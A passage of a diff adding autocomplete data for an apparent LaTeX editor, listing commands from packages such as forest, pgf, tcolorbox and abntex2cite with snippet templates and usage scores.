'\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'datetime-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'datetime-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'datetime-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'datetime-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + snippet: '\\csedef{$1}{$2}', + meta: 'datetime-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'datetime-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'datetime-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'datetime-cmd', + score: 0.0006796212875843042, + }, + { + caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'datetime-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'datetime-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'datetime-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + snippet: '\\preto{$1}{$2}', + meta: 'datetime-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: '\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'datetime-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'datetime-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'datetime-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'datetime-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'datetime-cmd', + score: 0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'datetime-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'datetime-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'datetime-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\frenchspacing', + snippet: '\\frenchspacing', + meta: 'datetime-cmd', + score: 0.0063276692758974925, + }, + ], + fontawesome: [ + { + caption: '\\RequireXeTeX', + snippet: '\\RequireXeTeX', + meta: 'fontawesome-cmd', + score: 0.00021116765384691477, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'fontawesome-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'fontawesome-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'fontawesome-cmd', + score: 0.2864294797053033, + }, + ], + forest: [ + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'forest-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\bracketset{}', + snippet: '\\bracketset{$1}', + meta: 'forest-cmd', + score: 0.00014301574866674164, + }, + { + caption: '\\forestset{}', + snippet: '\\forestset{$1}', + meta: 'forest-cmd', + score: 0.0020596473883671114, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'forest-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'forest-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'forest-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'forest-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'forest-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'forest-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'forest-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'forest-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'forest-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'forest-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'forest-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'forest-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'forest-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'forest-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'forest-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'forest-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'forest-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'forest-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'forest-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'forest-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'forest-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'forest-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'forest-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'forest-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'forest-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + snippet: '\\csedef{$1}{$2}', + meta: 'forest-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'forest-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'forest-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'forest-cmd', + score: 0.0006796212875843042, + }, + { + caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'forest-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'forest-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'forest-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + snippet: '\\preto{$1}{$2}', + meta: 'forest-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: '\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'forest-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'forest-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'forest-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'forest-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'forest-cmd', + score: 0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'forest-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'forest-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'forest-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'forest-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'forest-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'forest-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'forest-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'forest-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'forest-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\reserveinserts{}', + snippet: '\\reserveinserts{$1}', + meta: 'forest-cmd', + score: 0.0018653410309739879, + }, + { + caption: '\\newtoks', + snippet: '\\newtoks', + meta: 'forest-cmd', + score: 0.00031058155311734754, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'forest-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'forest-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'forest-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'forest-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'forest-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'forest-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'forest-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'forest-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'forest-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'forest-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'forest-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'forest-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'forest-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'forest-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'forest-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'forest-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'forest-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'forest-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'forest-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'forest-cmd', + score: 0.2864294797053033, + }, + ], + pgf: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'pgf-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgf-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'pgf-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'pgf-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'pgf-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'pgf-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'pgf-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'pgf-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'pgf-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'pgf-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'pgf-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'pgf-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'pgf-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'pgf-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgf-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'pgf-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'pgf-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'pgf-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'pgf-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'pgf-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'pgf-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'pgf-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'pgf-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'pgf-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'pgf-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'pgf-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'pgf-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'pgf-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'pgf-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'pgf-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'pgf-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgf-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'pgf-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'pgf-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'pgf-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'pgf-cmd', + score: 0.2864294797053033, + }, + ], + pstricks: [ + { + caption: '\\green', + snippet: '\\green', + meta: 'pstricks-cmd', + score: 0.0016005722621532548, + }, + { + caption: '\\green{}', + snippet: '\\green{$1}', + meta: 'pstricks-cmd', + score: 0.0016005722621532548, + }, + { + caption: '\\documentclass[]{}', + snippet: '\\documentclass[$1]{$2}', + meta: 'pstricks-cmd', + score: 1.4425339817971206, + }, + { + caption: '\\documentclass{}', + snippet: '\\documentclass{$1}', + meta: 'pstricks-cmd', + score: 1.4425339817971206, + }, + { + caption: '\\gray', + snippet: '\\gray', + meta: 'pstricks-cmd', + score: 0.0005786730478266738, + }, + { + caption: '\\red{}', + snippet: '\\red{$1}', + meta: 'pstricks-cmd', + score: 0.006520475264573554, + }, + { + caption: '\\red', + snippet: '\\red', + meta: 'pstricks-cmd', + score: 0.006520475264573554, + }, + ], + fancybox: [ + { + caption: '\\shadowbox{}', + snippet: '\\shadowbox{$1}', + meta: 'fancybox-cmd', + score: 0.00107667147399019, + }, + { + caption: '\\doublebox', + snippet: '\\doublebox', + meta: 'fancybox-cmd', + score: 0.00015142240898356106, + }, + { + caption: '\\VerbatimEnvironment', + snippet: '\\VerbatimEnvironment', + meta: 'fancybox-cmd', + score: 4.5350034239275855e-5, + }, + { + caption: '\\thisfancypage{}{}', + snippet: '\\thisfancypage{$1}{$2}', + meta: 'fancybox-cmd', + score: 0.00015142240898356106, + }, + { + caption: '\\TheSbox', + snippet: '\\TheSbox', + meta: 'fancybox-cmd', + score: 4.5350034239275855e-5, + }, + ], + braket: [ + { + caption: '\\ket{}', + snippet: '\\ket{$1}', + meta: 'braket-cmd', + score: 0.0326276280979336, + }, + { + caption: '\\braket{}{}', + snippet: '\\braket{$1}{$2}', + meta: 'braket-cmd', + score: 0.004421747491186916, + }, + { + caption: '\\braket{}', + snippet: '\\braket{$1}', + meta: 'braket-cmd', + score: 0.004421747491186916, + }, + { + caption: '\\ketbra{}{}', + snippet: '\\ketbra{$1}{$2}', + meta: 'braket-cmd', + score: 0.0006317858348936015, + }, + { + caption: '\\ketbra', + snippet: '\\ketbra', + meta: 'braket-cmd', + score: 0.0006317858348936015, + }, + { + caption: '\\bra{}', + snippet: '\\bra{$1}', + meta: 'braket-cmd', + score: 0.005609763332417241, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'braket-cmd', + score: 0.008565354665444157, + }, + ], + import: [ + { + caption: '\\import{}{}', + snippet: '\\import{$1}{$2}', + meta: 'import-cmd', + score: 0.1265354812350108, + }, + ], + abntex2cite: [ + { + caption: '\\citeonline{}', + snippet: '\\citeonline{$1}', + meta: 'abntex2cite-cmd', + score: 0.014277840409455324, + }, + { + caption: '\\bibitem{}', + snippet: '\\bibitem{$1}', + meta: 'abntex2cite-cmd', + score: 0.3689547570562042, + }, + { + caption: '\\bibitem[]{}', + snippet: '\\bibitem[$1]{$2}', + meta: 'abntex2cite-cmd', + score: 0.3689547570562042, + }, + { + caption: '\\bibliographystyle{}', + snippet: '\\bibliographystyle{$1}', + meta: 'abntex2cite-cmd', + score: 0.25122317941387773, + }, + { + caption: '\\citeyear{}', + snippet: '\\citeyear{$1}', + meta: 'abntex2cite-cmd', + score: 0.01091041305836494, + }, + { + caption: '\\cite{}', + snippet: '\\cite{$1}', + meta: 'abntex2cite-cmd', + score: 2.341195220791228, + }, + { + caption: '\\bibliography{}', + snippet: '\\bibliography{$1}', + meta: 'abntex2cite-cmd', + score: 0.2659628337907604, + }, + { + caption: '\\setstretch{}', + snippet: '\\setstretch{$1}', + meta: 'abntex2cite-cmd', + score: 0.019634763572332112, + }, + { + caption: '\\onehalfspacing', + snippet: '\\onehalfspacing', + meta: 'abntex2cite-cmd', + score: 0.010655415521079565, + }, + { + caption: '\\singlespacing', + snippet: '\\singlespacing', + meta: 'abntex2cite-cmd', + score: 0.008351544612280968, + }, + { + caption: '\\doublespacing', + snippet: '\\doublespacing', + meta: 'abntex2cite-cmd', + score: 0.007835428951987135, + }, + { + caption: '\\baselinestretch', + snippet: '\\baselinestretch', + meta: 'abntex2cite-cmd', + score: 0.03225350148161425, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'abntex2cite-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'abntex2cite-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'abntex2cite-cmd', + score: 0.354445763583904, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'abntex2cite-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'abntex2cite-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'abntex2cite-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\setcounter{}{}', + snippet: '\\setcounter{$1}{$2}', + meta: 'abntex2cite-cmd', + score: 0.10068045662118841, + }, + { + caption: '\\addtolength{}{}', + snippet: '\\addtolength{$1}{$2}', + meta: 'abntex2cite-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\addtolength', + snippet: '\\addtolength', + meta: 'abntex2cite-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\UrlBreaks{}', + snippet: '\\UrlBreaks{$1}', + meta: 'abntex2cite-cmd', + score: 0.001030592515645366, + }, + { + caption: '\\UrlBreaks', + snippet: '\\UrlBreaks', + meta: 'abntex2cite-cmd', + score: 0.001030592515645366, + }, + { + caption: '\\Url', + snippet: '\\Url', + meta: 'abntex2cite-cmd', + score: 0.0002854206807593436, + }, + { + caption: '\\UrlOrds{}', + snippet: '\\UrlOrds{$1}', + meta: 'abntex2cite-cmd', + score: 0.0006882563723629154, + }, + { + caption: '\\UrlOrds', + snippet: '\\UrlOrds', + meta: 'abntex2cite-cmd', + score: 0.0006882563723629154, + }, + { + caption: '\\urlstyle{}', + snippet: '\\urlstyle{$1}', + meta: 'abntex2cite-cmd', + score: 0.010515056688180681, + }, + { + caption: '\\urldef{}', + snippet: '\\urldef{$1}', + meta: 'abntex2cite-cmd', + score: 0.008041789461944983, + }, + { + caption: '\\UrlBigBreaks{}', + snippet: '\\UrlBigBreaks{$1}', + meta: 'abntex2cite-cmd', + score: 3.7048287721105874e-5, + }, + { + caption: '\\UrlFont{}', + snippet: '\\UrlFont{$1}', + meta: 'abntex2cite-cmd', + score: 0.0032990580087398644, + }, + { + caption: '\\UrlSpecials{}', + snippet: '\\UrlSpecials{$1}', + meta: 'abntex2cite-cmd', + score: 3.7048287721105874e-5, + }, + { + caption: '\\UrlNoBreaks', + snippet: '\\UrlNoBreaks', + meta: 'abntex2cite-cmd', + score: 3.7048287721105874e-5, + }, + { + caption: '\\RequireXeTeX', + snippet: '\\RequireXeTeX', + meta: 'abntex2cite-cmd', + score: 0.00021116765384691477, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'abntex2cite-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'abntex2cite-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'abntex2cite-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'abntex2cite-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'abntex2cite-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'abntex2cite-cmd', + score: 0.0018957469739775527, + }, + ], + isodate: [ + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'isodate-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'isodate-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'isodate-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'isodate-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'isodate-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'isodate-cmd', + score: 0.0018957469739775527, + }, + ], + tcolorbox: [ + { + caption: '\\tcbset{}', + snippet: '\\tcbset{$1}', + meta: 'tcolorbox-cmd', + score: 0.00012246447222402193, + }, + { + caption: '\\tcbuselibrary{}', + snippet: '\\tcbuselibrary{$1}', + meta: 'tcolorbox-cmd', + score: 4.347671035621014e-5, + }, + { + caption: '\\newtcolorbox[]{}[][]{}', + snippet: '\\newtcolorbox[$1]{$2}[$3][$4]{$5}', + meta: 'tcolorbox-cmd', + score: 7.216282820556303e-5, + }, + { + caption: '\\arraystretch', + snippet: '\\arraystretch', + meta: 'tcolorbox-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\arraystretch{}', + snippet: '\\arraystretch{$1}', + meta: 'tcolorbox-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\newtcbox{}[][]{}', + snippet: '\\newtcbox{$1}[$2][$3]{$4}', + meta: 'tcolorbox-cmd', + score: 3.558785984219631e-5, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'tcolorbox-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tcolorbox-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'tcolorbox-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'tcolorbox-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'tcolorbox-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\endverbatim', + snippet: '\\endverbatim', + meta: 'tcolorbox-cmd', + score: 0.0022216421267780076, + }, + { + caption: '\\verbatim', + snippet: '\\verbatim', + meta: 'tcolorbox-cmd', + score: 0.0072203369120285256, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tcolorbox-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tcolorbox-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\par', + snippet: '\\par', + meta: 'tcolorbox-cmd', + score: 0.413853376001159, + }, + { + caption: '\\verbatiminput{}', + snippet: '\\verbatiminput{$1}', + meta: 'tcolorbox-cmd', + score: 0.0024547099784948665, + }, + { + caption: '\\verbatiminput', + snippet: '\\verbatiminput', + meta: 'tcolorbox-cmd', + score: 0.0024547099784948665, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tcolorbox-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tcolorbox-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tcolorbox-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tcolorbox-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tcolorbox-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'tcolorbox-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'tcolorbox-cmd', + 